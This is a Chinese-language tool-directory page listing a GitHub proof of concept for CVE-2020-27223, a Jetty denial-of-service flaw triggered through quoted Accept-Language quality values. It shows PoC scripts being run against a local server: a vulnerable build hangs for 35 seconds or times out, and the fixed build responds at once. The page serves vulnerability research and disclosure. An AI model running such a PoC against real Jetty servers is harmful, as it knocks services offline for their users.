Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-27223 — CVE-2020-27223漏洞应用与PoC | Kitploit
工具/GitHubGitHub/motikan2010/cve-2020-27223
漏洞分析漏洞利用Web安全渗透测试
GitHubmotikan2010/cve-2020-27223

CVE-2020-27223

CVE-2020-27223漏洞应用与PoC

查看仓库
35年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-27223

使用方法

root@kitploit:~
$ mvn spring-boot:run

9.4.36.v20210114

root@kitploit:~
$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"58,557","accept_language":"aab"}
real	0m0.093s 🐇
user	0m0.006s
sys	0m0.007s
{"time_ns":"18,461,763,438","accept_language":"ahn"}
real	0m35.339s 🐢
user	0m0.006s
sys	0m0.006s

9.4.37.v20210219 (已修复)

root@kitploit:~
$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"36,675","accept_language":"aab"}
real	0m0.023s 🐇
user	0m0.005s
sys	0m0.007s
{"time_ns":"1,265,004","accept_language":"ahn"}
real	0m0.024s 🐇
user	0m0.006s
sys	0m0.006s

PoC

root@kitploit:~
$ ./poc/cve-2020-27223-poc2.sh
curl: (28) Operation timed out after 120000 milliseconds with 0 bytes received

real	2m0.025s
user	0m0.016s
sys	0m0.009s

参考

  • Quoted Quality CSV标头的DOS漏洞 · 公告 · eclipse/jetty.project
  • 合并来自GHSA-m394-8rww-3jr7的拉取请求 · eclipse/jetty.project@10e5317
下载工具